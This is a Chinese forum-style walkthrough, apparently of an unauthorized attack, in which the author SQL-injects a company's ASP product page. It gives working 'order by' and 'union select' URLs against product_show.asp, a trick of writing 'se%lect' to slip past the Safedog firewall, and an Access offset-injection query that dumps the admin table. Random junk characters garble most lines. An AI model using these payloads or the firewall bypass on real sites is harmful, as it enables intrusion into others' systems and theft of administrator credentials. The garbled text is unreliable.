打开网站,一个企业站。+ O) N( q6 D5 d5 A
; d$ M' W/ y4 w" p$ U( g5 h$ E1 l$ ?7 Y" {1 A' @" j/ A
顺手加个admin
, e) M! a; p1 z( M, Q- g& R$ d& k- R3 r8 J- y; L
2 h1 c% \& T3 p8 h" w1 [$ v
默认后台。( T2 d. Q6 s& B" C0 ?8 @
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。- i) N' \: s' J0 f; [( T
6 P& x' r* L4 K1 U% I; X( z6 _: i2 T- a; H- v
0 Z. \3 k5 T! @: H. e* r所以就不用御剑扫了,待会直接封IP。
, r# |4 y8 b8 d4 Z1 ^
* P3 H# {+ I. r/ t# d: ^, ]用order by语句判断是否存在注入。0 @. c5 q# l' L' h* w
http://www.xxx.com /product_show.asp?id=997 order by 1. W4 h4 c+ J; R: W1 T
http://www.xxx.com /product_show.asp?id=997 order by 100
! ^9 q3 f; t& ~6 z) W2 p现在存在注入,经测试后发现是9个字段。
0 E9 L) i! B' t( e' ?3 r3 t9 z) g 8 L9 C& e% v, D" s% k" Y
接下来进行联合查询,猜是否存在admin表。5 a7 \6 V6 e- Y. K6 T1 M. \9 v
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
4 r5 x c$ K! l6 R0 Y J; L3 s9 i% H3 u0 y: F8 H4 H
) b1 \9 _5 X. Y/ X8 t1 D5 l
- q- n5 O. I0 x在select中间加个%,se%lect绕过安全狗。 F$ p b: d( ]: X
# |5 J: E/ Z1 d+ s
% i- g+ l1 w' g- ~7 @+ ^发现存在admin表,然后开始手工猜常用的字段。
1 T3 t6 y( w6 x* o# P纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。 ], x5 m, P) c0 p! o
/ n+ j% ^# w8 s8 C) y/ r
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。7 O& I3 Z9 o) l
% [: p. ^* w3 ^6 H" t4 F8 X科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。& U! {! V J% i3 J E# _
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin2 c- Q. R7 n. m0 d& O
好了,敏感内容出显了。
2 H1 s$ w* j S9 }. h6 x7 h) y- P$ m8 y9 m. e' V8 u* u
7 _0 i( H4 f/ L% d8 \8 S
, n. P# D* D% B- v, K* M& p5 i# Z |